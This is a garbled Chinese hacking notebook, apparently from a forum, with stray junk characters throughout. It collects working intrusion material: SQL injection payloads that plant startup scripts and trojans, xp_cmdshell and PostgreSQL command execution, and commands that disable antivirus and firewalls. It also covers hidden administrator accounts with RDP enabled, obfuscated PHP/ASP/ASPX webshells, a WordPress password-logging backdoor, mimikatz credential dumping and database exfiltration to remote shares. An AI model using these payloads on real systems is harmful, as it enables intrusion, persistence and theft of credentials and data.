1 S/ B9 N" k/ @! R7 V) U" b5 Minsert into a values ("set wshshell=createobject (""wscript.shell"") " );
6 P+ i% q: J& winsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; I, {' {) [& C, Q5 g! Q3 N, Iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
2 i) f: a" [+ M/ q) Nselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
/ u( T$ ^- Q; z4 _5 sdrop table a; K3 A) b. [6 }2 `
+ ]4 L- ^! g1 R( t3 C2 G英文版本:2 \9 L: u: m9 ^# O) b/ q" L- T
* f" Y W! c6 K# `
use test;) X8 O2 J- C! M% b4 ^
create table a (cmd text);
- v$ X( ~$ ]' H# S; oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
0 z8 }8 r, |8 x, @insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 R" A2 W+ a. ^7 `' cinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 `+ W4 @' \( ]% ^. o
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
2 a6 Q# |+ {1 _drop table a;
& k% x" B" K# a
* f2 C5 |- _; T* {. `create table a (cmd BLOB);4 f* e: q' F! g$ X5 W) b8 x8 f9 D
insert into a values (CONVERT(木马的16进制代码,CHAR));% ~3 K( k9 y2 i
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'! [7 S ^+ ]2 E" g& @; t. J
drop table a;
9 ~7 c& R3 x$ b+ s, \( U: @ p
记录一下怎么处理变态诺顿- j8 T6 D& p! i6 }
查看诺顿服务的路径
, Y2 L3 y a: Q5 E/ a1 |, _sc qc ccSetMgr2 k- h, S3 U* b/ F/ b6 [, Z
然后设置权限拒绝访问。做绝一点。。
; F" z% E: t; t r; xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
0 Z) E5 @- q# C& |; _/ Ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
6 H) h" ` ]4 d0 Rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators d* y. D! N) |# ~0 U) I7 q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
$ N' u$ a a$ c- f9 D4 V1 }2 U7 G& a1 v' n* s, D) H0 _7 G- H- D
然后再重启服务器# X) ^) K- U/ g" w. }
iisreset /reboot8 H1 c v- w1 |
这样就搞定了。。不过完事后。记得恢复权限。。。。+ b+ Y4 t, H" U# o
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
* _5 q5 H' g- w$ e8 ~( O9 F, Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
+ H' r6 Y; }9 c' z( Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F/ i4 Q% v4 m+ N1 m* y' c- q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F4 k+ @: s8 O' ~8 E/ @0 `1 J
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin" O. f0 r9 l4 f! X% \% k
- T; B7 n- I {* p4 QEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')' o! r, A1 |( g1 J. z
- q5 Y5 s1 @1 {8 h7 G
postgresql注射的一些东西) b- b4 b# k) u f, E
如何获得webshell. Y' ~6 i0 d/ h
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 2 E$ ?4 ^: h. m0 [: |
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
; r5 _1 R% z4 k+ @http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;$ ~/ E+ j2 y9 g& a! q: k: D; c! Q
如何读文件
7 s2 q7 E$ V2 n/ thttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
/ h5 z- X* [6 D, S6 A" s; F3 fhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
$ _* M8 E" n, A6 [http://127.0.0.1/postgresql.php?id=1;select * from myfile;
' z; X+ w- I. A% @( Q7 Z4 S7 Y6 ~& y0 S$ a. R& Z% @+ J
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。: A, n9 f, J, `" m6 {# W, v0 B3 y
当然,这些的postgresql的数据库版本必须大于8.X
( C8 [0 V+ q! R" t2 L( n6 u创建一个system的函数:! r# ]) R: n/ H( P/ m; G/ l5 d! q
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT5 A+ B+ t2 z5 h- V, B4 \- U' I
4 P# A4 c- c8 _! @8 X% k D- I! I9 q2 p
创建一个输出表:
1 Z9 y" D$ d) K" {5 ICREATE TABLE stdout(id serial, system_out text)2 C$ Q* P) l$ a! H8 G0 ]) G
. ]0 d' r( o" o; B) Z% k# m
执行shell,输出到输出表内:& d" i: _; E' T1 t, u
SELECT system('uname -a > /tmp/test')
- M: C, q( J7 @
* J7 a! M0 y5 T0 w* ]copy 输出的内容到表里面;
$ J! z4 M/ U& G: u. i/ OCOPY stdout(system_out) FROM '/tmp/test'
- l8 u- s/ |, q
% P8 N( T4 i, v从输出表内读取执行后的回显,判断是否执行成功
6 Y+ i. B5 D( `5 T. T+ \4 M1 |$ l; b0 e" \' `% E) v: c* Y
SELECT system_out FROM stdout
% o% i9 p" N* s% x5 y+ ~8 n+ O2 O下面是测试例子
' A2 j, S5 |' }8 p* n
) i4 v* M1 b: d; p/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
% t6 T1 d8 v1 }: n( ^! Z) C
) g/ Q$ ~8 n5 ]9 {* l/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'9 D/ ?2 J l/ Y- k7 e
STRICT --9 y Y4 Y g( D& ^
4 n$ p7 s0 R7 C5 r0 c! u) Q/store.php?id=1; SELECT system('uname -a > /tmp/test') --5 V) j" }# I+ O, b- R" j
% u3 u5 j2 K/ D7 u$ z$ y, p- J( c
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
$ P, |/ ] l7 ?/ F9 M5 o2 ^% K" ~. F# k5 W! f, ^# O
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--6 S% a! {: G. V8 A
net stop sharedaccess stop the default firewall
8 q6 {+ B! B$ G( enetsh firewall show show/config default firewall# X% X7 @8 b! B" J) m, P
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
8 S; Y. d, k) onetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
- M5 x8 [8 F: r+ \! y# w修改3389端口方法(修改后不易被扫出)
5 E2 K9 O& V' _! a6 I修改服务器端的端口设置,注册表有2个地方需要修改' ~, k& b9 r7 [4 ^! t+ Q1 L9 I% i
- c1 T U, f. l: u9 q( f
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]. J" o4 F* @' y$ T; q& U, b! b) J
PortNumber值,默认是3389,修改成所希望的端口,比如60002 d( s# m+ S6 Q6 \1 Y
1 _* I+ Y5 p; X
第二个地方:; @& J! C% g* i7 w
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ( s& C6 q8 t# j0 C' Q6 Y; V! c
PortNumber值,默认是3389,修改成所希望的端口,比如6000
8 @7 l3 L4 G' z% e* c2 a. ]* _. W8 b& g+ X: d s
现在这样就可以了。重启系统就可以了
. W2 g" [# J" T% V' X \; A! {/ ^5 D+ J* Y( ^, V
查看3389远程登录的脚本* j) f3 T2 Y) R- P' u
保存为一个bat文件
& l3 S" p9 G- X9 U! ?date /t >>D:\sec\TSlog\ts.log9 ]: W' L# e. Y
time /t >>D:\sec\TSlog\ts.log1 |8 W, X- z6 |' X. |$ A, L+ I
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log3 D4 I' L/ n! j9 a4 m& I
start Explorer! j1 m' o9 I7 R) |4 w: H
- X' ^0 i5 \. r J5 Ymstsc的参数:( n- \# V' m% H7 p& W+ K3 p
8 q; C7 r3 C! H+ `8 g% P: M. p: \1 N+ Z
远程桌面连接
8 i$ h5 `9 M j+ c* M1 A. [9 a( m7 z d2 r
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]# N' v% A8 r5 H+ T8 _+ m2 ^
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
6 D6 S+ \7 X9 T* T. c
* ^) E% i" n3 {. ` B5 O( ^+ t5 A<Connection File> -- 指定连接的 .rdp 文件的名称。6 P% i- W5 C* k2 h( R/ l: { ?
6 F( B( f& u3 T& E
/v:<server[:port]> -- 指定要连接到的终端服务器。
3 v' ~1 B0 ~) }" J4 v, S
2 G( W: J* X* P( A9 D5 o/console -- 连接到服务器的控制台会话。: d& t, p2 H. }
9 l' ?$ x9 Q6 Q3 J* Z. P% D/f -- 以全屏模式启动客户端。
% e/ ?6 _! K7 B, _+ q6 }4 W! L+ }9 c. c% ]3 e: n3 H1 g& X3 F7 o
/w:<width> -- 指定远程桌面屏幕的宽度。* r: g8 A+ q* N2 O3 R
8 J% L$ f& ~/ Y B
/h:<height> -- 指定远程桌面屏幕的高度。
- }/ g' z* R/ s% U: P
" ~+ w. u& g' l- \( }0 n% W/edit -- 打开指定的 .rdp 文件来编辑。) s8 p$ [7 `# v5 ~8 J! o! N
* Y9 S6 u7 i! d; r5 Y/migrate -- 将客户端连接管理器创建的旧版 w7 e& m6 Z, C( F
连接文件迁移到新的 .rdp 连接文件。! D3 i( ?5 a6 H
7 F. U* v% D% ^; R0 F& o& n7 ]+ ~! @
2 F1 v- c F( z; l3 s* G
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就' a/ J# v2 ]' ]- T1 s' w
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
' j& m) B" y F: Q o" g: T" j& T
! S% i' V/ \1 j- _命令行下开启3389% |' w' Z& F3 @% ? }$ G
net user asp.net aspnet /add- d6 c5 M% w( V7 t/ o# x6 k# G3 z
net localgroup Administrators asp.net /add
* y: O+ @, F; g" `+ V$ Pnet localgroup "Remote Desktop Users" asp.net /add% y- d2 q- q, h- f
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D6 s6 U7 f* W. X8 M9 ]. r
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
8 B3 c) y" m/ ]; v% `: S6 recho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1( U+ X' q5 F5 p: T2 r5 E$ L4 `
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
6 p" |1 M5 H/ ?% S" Psc config rasman start= auto, z) d) J3 {( O' O
sc config remoteaccess start= auto% Y/ J9 K; w( J6 i& k8 e4 t
net start rasman
( ?4 G D: X+ u9 c5 o: s* O& i& hnet start remoteaccess" r0 P* L) ^6 E4 Z$ b8 v
Media
1 Y0 Q( s/ `" d: q; {4 [3 J* {<form id="frmUpload" enctype="multipart/form-data"
4 p8 Q+ R5 [* T0 H/ `( _action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
6 e2 X5 Y0 `4 L6 g<input type="file" name="NewFile" size="50"><br>5 Y' ?7 z& f) v+ b% u1 v
<input id="btnUpload" type="submit" value="Upload">
) `4 p- K- j! N- A# H</form>3 Q( N9 V8 R: ^/ h& o* E
3 |9 N5 E+ ~$ `# h2 B
control userpasswords2 查看用户的密码
% Z) F9 l+ M/ r* Jaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径3 \$ l6 p" l2 P0 r
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a3 {; |/ f; G- w6 [: H2 T
9 o) U6 a' `; q& W5 Z141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:5 n" w8 ?' c+ G3 i! V/ Q. i! z
测试1:( z' e# B4 }+ g1 Q) ~6 C* c8 a
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
9 C7 W$ U3 w1 V3 U5 M" U; R W& o+ T* g; L
测试2:
* o+ g) y; j: j. r- L; h$ f, t3 K# v/ D" K/ X
create table dirs(paths varchar(100),paths1 varchar(100), id int) F5 l) Q; z. n. n% W6 n
6 e" i% }2 d: N) [delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--' v3 T k7 n; \$ ?: u/ _
' |* F* A. U Y) e
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1! M/ W& A7 a; l r! d1 O% C8 l' E
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令; l* I- I( C( i8 O5 Y/ t0 e
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
4 U- R# c, q7 Onet stop mcafeeframework, Y6 q+ ~$ x: L; }1 h. c5 Z8 D( `
net stop mcshield) g0 J: q6 H. Q; K
net stop mcafeeengineservice
; D) Q& _- z2 Q8 S$ z/ _# s. ynet stop mctaskmanager1 w8 O6 m1 S2 v" h1 j
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D, U# I8 H9 B2 _; r% D/ C6 G; a
5 U5 r/ b7 c% \# I9 Q
VNCDump.zip (4.76 KB, 下载次数: 1) " l3 P g3 u0 e; J4 m5 d, q: S# S
密码在线破解http://tools88.com/safe/vnc.php
3 d" w9 N9 q) \2 h% G. [; bVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取) ?! Y" Q/ X# G+ W7 r* H* J* F
$ S, P4 Z6 T8 E5 `! _% b, u
exec master..xp_cmdshell 'net user'
$ p" D2 q/ v. X* s" `mssql执行命令。
# M: W* U; T8 b) d. D获取mssql的密码hash查询
( a) p* B+ \8 Z+ A. o+ L! hselect name,password from master.dbo.sysxlogins/ [9 c$ D! _, U+ e: ?1 y
: |8 `" q8 M: `$ x. lbackup log dbName with NO_LOG;# F# A8 A8 D3 X1 v0 M
backup log dbName with TRUNCATE_ONLY;' {& i$ W, X' W! Y) N8 [
DBCC SHRINKDATABASE(dbName);, f) x' o; A& X
mssql数据库压缩
7 R+ t' {! l N# a- N$ O' S @! c2 o5 [6 n6 e& `
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
# N P' ]/ O. ?( H( r, G) M将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。( D! }' s! Z6 k* k( g
; q! q9 x2 C+ R- |; fbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
! T; W/ Q$ X$ `/ L9 ]% e6 l备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak |9 T+ E) w6 b5 ?1 H* x
5 c" G5 h p" b3 @& j) a. CDiscuz!nt35渗透要点:
# I) J2 V/ j, W$ t0 N' L4 X4 D(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default8 L) D; b- `; e3 ?- ^/ w
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>0 |: p* w9 z6 q
(3)保存。
9 o2 a1 P+ D: u$ h9 \! R(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass4 x$ B% @8 P) `
d:\rar.exe a -r d:\1.rar d:\website\
2 E( C# g# }- Y0 C& ?递归压缩website* s9 G ^6 K8 G. v
注意rar.exe的路径& j# k+ g, o% ]. w/ M
' |2 M% V" g0 p, G8 p5 b: I
<?php" w' E3 z" D) J
4 s' Y0 n6 R# o9 {- A$telok = "0${@eval($_POST[xxoo])}";. q; D6 z2 F0 M: P
! ?* D# Z* ~) z3 m- H9 d) z; g$username = "123456";2 P# o# D% r' T; ?
8 u% m$ r, n# k9 B: G$userpwd = "123456";2 O8 {# Z4 t% }5 r' q
( h% I0 T! `# u
$telhao = "123456";
3 r) I: [5 W5 _/ [1 A5 [9 {* U" Z) h' h& N4 o
$telinfo = "123456";
7 ?4 B' H3 A7 T6 A' S) l" x. t, }% Y
?>5 g5 x0 u, q7 P; P4 T Y
php一句话未过滤插入一句话木马
1 ]& F' t3 d7 A: Q5 H+ e$ \/ c. c: D5 @ t% ~5 |
站库分离脱裤技巧3 \( `9 [, U) A6 d( R
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'" g, i' F7 D% X, s3 h% G8 S
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'5 L% y# R: }* L
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
: |$ h4 C& X! E" [! J. v这儿利用的是马儿的专家模式(自己写代码)。5 r: h( t, m" p
ini_set('display_errors', 1);
& r3 @: U( Y' g$ Y, Jset_time_limit(0);8 d% r& Q; v$ f5 i# F
error_reporting(E_ALL);/ X7 l) P Y2 F- K
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());; K5 y/ }4 r5 G$ G4 D2 q1 Y
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
F4 x" y8 f- |% _9 f# ~$ r- v# W$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
' i! z+ H( W9 {6 k( J6 o# q6 H$i = 0;4 Y. l& J/ Z" q# j, Z" A7 P
$tmp = '';% {5 v$ C! s$ l6 `
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {4 X8 a' d5 J; K4 V' N
$i = $i+1;
1 d% ~) R3 t9 `6 K* f $tmp .= implode("::", $row)."\n";
6 }& R' V5 u2 g4 _' h2 x- w& r if(!($i%500)){//500条写入一个文件
; O3 J+ ~" d: X9 K$ l $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';2 L+ o4 o- G( E+ a3 E
file_put_contents($filename,$tmp);
( q6 L9 G% K; l0 A/ N; `, P% K $tmp = '';
) x5 t$ O5 ^% |$ T( m9 I }0 g1 e. K) g' m3 G1 T
}" _" R5 D8 W6 q0 E! w
mysql_free_result($result);/ v5 ^: N8 r4 g9 [; {- u" S
7 u) @, A2 `1 v/ ^9 ]+ F7 _4 G* r# Q" A
4 t, t( C* M2 b
//down完后delete
k) c; F) w6 J
1 o6 z8 m* X9 z3 G# `; u P1 l/ \
: ?5 @( Y$ _: {, Z* M! r! V# B; Rini_set('display_errors', 1);
8 {9 G' x- J. s: F% t/ u% jerror_reporting(E_ALL);
/ i0 q E4 X. d0 B# x$ h2 \$i = 0;
! B& ^# e' e4 n' o# k5 |while($i<32) {0 j) ~6 T% ^% J+ R
$i = $i+1;+ F' z% S3 ?7 C0 J' G0 _, B# |* R
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
, \& C/ C4 T5 L# l% M unlink($filename);
4 Z6 l K+ n, }2 h i4 y}
" v: g' n. I2 v! X( ?6 Q% ohttprint 收集操作系统指纹) G6 T6 ~0 Z. o6 u. k5 ?
扫描192.168.1.100的所有端口
" @7 @& O% \' @3 T7 T/ H$ A: hnmap –PN –sT –sV –p0-65535 192.168.1.100& R0 d& E1 x9 y$ J4 w5 I0 u, L
host -t ns www.owasp.org 识别的名称服务器,获取dns信息6 A z4 c% O( d5 T, a
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
0 G9 I4 P2 T% V% d! D: e9 E0 R9 m9 TNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
' K! b J8 Z. i3 n2 e4 H! q9 J
^1 \4 _$ q, |$ e5 \Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
. u; H) f& S- r4 ^' Z* Y- M: Z4 T4 a2 D' x3 T* c
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
5 n6 q8 M. i* _$ i% O9 }% {+ G* a
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
) F* s% h3 s) c% _. b
+ E1 g) b9 G! \4 t- g DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)" Q9 U3 H9 M6 G' X# ?, G
- L8 w# r r q6 f! d: j
http://net-square.com/msnpawn/index.shtml (要求安装)
' f8 O/ _. b. v+ `- a# P! @! A* @0 e1 u6 n1 a* f2 g& _
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)% S: f6 E% N0 n6 x c8 j3 E
2 r5 u( p. I8 ?, X! b3 \3 K- ?
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
/ ?* A# m/ O# E: z* d# @) G( Iset names gb23125 s+ N! j5 y8 X, r$ q4 p# r2 }: i
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
1 \2 E; ^% X7 |3 L3 X5 P+ U8 ?) p& M; A( K0 q
mysql 密码修改
: `6 z' ]8 X9 a0 h( |, SUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 4 ?$ o! z1 a+ k
update user set password=PASSWORD('antian365.com') where user='root';
% i& y T1 V% T" s+ u( {% j- ]1 zflush privileges;
' Y" L3 X. l; b, b5 w高级的PHP一句话木马后门
; G. c8 i9 x. t6 E C& H0 t0 D# `' K6 m$ H: E9 T3 g% h5 p5 _/ u. |. F7 j
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀& t t# J5 C' g& F& ]9 }: ~8 C/ }- }
" [& x4 d' h" X1、1 z, _7 v4 R8 [1 [$ {
& b- j, b/ ?7 o+ ?0 e& C
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
3 E9 e5 E G, D1 y
9 z, J* y# |' s$hh("/[discuz]/e",$_POST['h'],"Access");
/ S$ z Q7 u( Z5 l. v6 x
* F% e v) T% ]1 |$ T//菜刀一句话' J1 Y, M- c6 Q3 }
! v$ X p- l8 N9 @
2、
9 X/ ~" E" G! g# i& K4 t; y
" i) W9 S/ E5 t; L$ V0 u$filename=$_GET['xbid'];
: q; `! U; M6 w/ ?3 C3 L, X$ r: K+ y- t& g
include ($filename);
3 o% T/ \8 G; T) R7 y5 q
+ P4 ?* k: i3 y//危险的include函数,直接编译任何文件为php格式运行+ M1 q7 V; q& K8 {4 B
' E, P, }6 W! Y; t3、4 J( ~7 q; D. p% s
; |4 S5 L& I( t( s' h; W$reg="c"."o"."p"."y";; w- k. f' C& U
b' S% k, J8 ]$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);0 H% m$ S- h' Y0 l8 c0 j
5 V7 u) w" o6 C! m; x$ J
//重命名任何文件: p# t! [: y6 P# X; ?
' M0 b. Y/ L. Y2 C2 y V
4、
5 }; r" h3 o3 s Z0 h( n7 n* q5 e# _0 ^7 [4 R1 H, f' N9 U
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";! ?) @8 h0 O2 `# V
$ Z% C. n' o0 X/ J- z! r
$gzid("/[discuz]/e",$_POST['h'],"Access");
3 {) I3 A1 ^. C q1 H. O4 y
( M% N6 G" m# H2 e6 d. L9 P' @) l//菜刀一句话
! f( y2 u0 @. F0 Z) }
( [$ P- }+ P- t2 E; ]) a5、include ($uid);" p1 p N* u2 e P) g1 d
9 m' X6 H. o& M; x+ E
//危险的include函数,直接编译任何文件为php格式运行,POST , R: N4 D. Q7 k* c
$ b- U/ E8 K- t. U' w R- P
, w4 z0 p. R2 n- T* l6 Z5 U
//gif插一句话
7 `8 d4 A& W0 n
& F2 [5 z. w0 N. Q0 u' R, H( P6、典型一句话& D. f8 A3 R0 e3 U- A$ i* n; W
8 O. F8 x5 r8 ?% S程序后门代码" B, I" U2 |6 A& Y9 u
<?php eval_r($_POST[sb])?>
3 B c) s" v# x程序代码
9 {% O [* @1 \, P. m% v' Q9 v( A<?php @eval_r($_POST[sb])?>
( K/ W% g0 O0 c7 k, w! @, t//容错代码
7 {: v8 Y+ x5 }程序代码* P5 w) P! Y; g2 ], H
<?php assert($_POST[sb]);?>
: X, l) s) s( t/ q! ]$ u/ |8 P//使用lanker一句话客户端的专家模式执行相关的php语句# k( ^. G) U, H. C' m; M3 e
程序代码/ z3 A8 l5 c2 D2 h6 |
<?$_POST['sa']($_POST['sb']);?>
* W. T7 {% {9 p) k0 W" \程序代码
( f# s) f x4 m: t7 k<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>' v9 ~2 W6 S. d L/ ?' N0 g
程序代码
( w6 }+ w4 W! S0 }; D<?php, h; q/ W# @- i( Y: H, b
@preg_replace("/[email]/e",$_POST['h'],"error");
8 s+ D0 \* e6 m8 g- X2 J& E4 ^?>6 y3 W# H+ d; @+ b- s% O% h& ~& m& Y
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
; G& ]7 C6 v: c! d1 D! x& \6 Y程序代码9 Z9 r8 V, B, _
<O>h=@eval_r($_POST[c]);</O>% F2 m5 M5 t5 a( e
程序代码
7 `0 s2 j. U9 ?9 k$ \) n& ]' S<script language="php">@eval_r($_POST[sb])</script>, v8 _" {) i" e$ v
//绕过<?限制的一句话
5 U& G/ @8 E7 [
) t7 d/ \/ r0 y& u6 D8 Uhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
3 T+ |- J$ A& Z6 r详细用法:
4 E- F t4 l |2 c1 Y1、到tools目录。psexec \\127.0.0.1 cmd
! [$ B+ I2 s1 A0 |2、执行mimikatz
& s0 a# _7 U, F T, @5 [3、执行 privilege::debug h7 M `3 w2 r$ r1 I3 U
4、执行 inject::process lsass.exe sekurlsa.dll. Y/ f- M& [9 K! X
5、执行@getLogonPasswords
: s: U+ ^* k/ T+ Q' s3 D6、widget就是密码5 f$ i I) k. _# f1 z# Z) b: `
7、exit退出,不要直接关闭否则系统会崩溃。9 z' x$ s U3 X+ l
" K- P7 p6 c- a9 s7 i' C! yhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
9 E' ?# H. @* ~1 [- c5 h; ?7 H, i$ Z; D: e7 Z8 U
自动查找系统高危补丁2 C7 M4 }, L0 U9 [& }& a
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt: K' k/ [& a* t" B* G: j
; F0 R- V+ `; P
突破安全狗的一句话aspx后门; j s( W% T/ [% Y
<%@ Page Language="C#" ValidateRequest="false" %>
6 |9 r4 ?" F* l8 ?2 `<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
8 @! D5 b5 f3 \webshell下记录WordPress登陆密码: k0 d" m K! w
webshell下记录Wordpress登陆密码方便进一步社工. S( K% q- n: I
在文件wp-login.php中539行处添加:( m3 S& W' |3 c& U* u
// log password
3 M/ W4 T) @3 u8 l1 P/ I$log_user=$_POST['log'];1 a- {) n% a* M0 I
$log_pwd=$_POST['pwd'];
. ?. a( z* v" Z. ]$log_ip=$_SERVER["REMOTE_ADDR"];
# E4 _8 `% B. G: C0 I' N! K9 R$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;: s# L0 |- X. f& z C0 h. i
$txt=$txt.”\r\n”;6 J, d/ N) D! e, [* d
if($log_user&&$log_pwd&&$log_ip){# L3 i# k: X5 g. i/ r' ?
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
3 } t% s! z7 W+ j2 W2 s}
" z1 \) a5 X6 C& Z- f当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。8 u. y2 I* m1 V) K Y
就是搜索case ‘login’& h9 b8 L! l3 z; y
在它下面直接插入即可,记录的密码生成在pwd.txt中,# f1 |8 {; @+ D
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
7 }$ T, W" I8 _$ i利用II6文件解析漏洞绕过安全狗代码:9 k2 y% U0 b5 L3 H5 ?
;antian365.asp;antian365.jpg# @6 _# ? n4 c3 G/ c
- {! v& T; t+ _; ^ k! j+ l. L各种类型数据库抓HASH破解最高权限密码!
$ K% i, _# d% {# ?3 n1.sql server2000
# J+ y" i* E: @/ I- ^SELECT password from master.dbo.sysxlogins where name='sa'
